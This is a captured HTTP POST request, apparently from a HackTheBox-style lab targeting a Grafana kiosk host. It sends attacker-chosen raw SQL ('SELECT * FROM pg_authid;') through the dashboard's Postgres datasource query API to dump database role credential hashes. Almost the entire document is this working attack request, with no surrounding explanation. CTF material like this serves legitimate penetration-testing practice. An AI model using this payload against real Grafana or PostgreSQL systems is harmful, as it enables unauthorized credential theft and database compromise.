POST /api/ds/query HTTP/1.1
Host: kiosk.jupiter.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://kiosk.jupiter.htb/d/jMgFGfA4z/moons?orgId=1&refresh=1d
content-type: application/json
x-dashboard-uid: jMgFGfA4z
x-datasource-uid: YItSLg-Vz
x-grafana-org-id: 1
x-panel-id: 4
x-plugin-id: postgres
Origin: http://kiosk.jupiter.htb
Content-Length: 342
Connection: close
Cookie: redirect_to=%2Fd%2FjMgFGfA4z%2Fmoons%3ForgId%3D1%26refresh%3D1d

{"queries":[{"refId":"A","datasource":{"type":"postgres","uid":"YItSLg-Vz"},"rawSql":"SELECT * FROM pg_authid;","format":"table","datasourceId":1,"intervalMs":60000,"maxDataPoints":663}],"range":{"from":"2023-06-18T21:08:03.085Z","to":"2023-06-19T03:08:03.085Z","raw":{"from":"now-6h","to":"now"}},"from":"1687122483085","to":"1687144083085"}
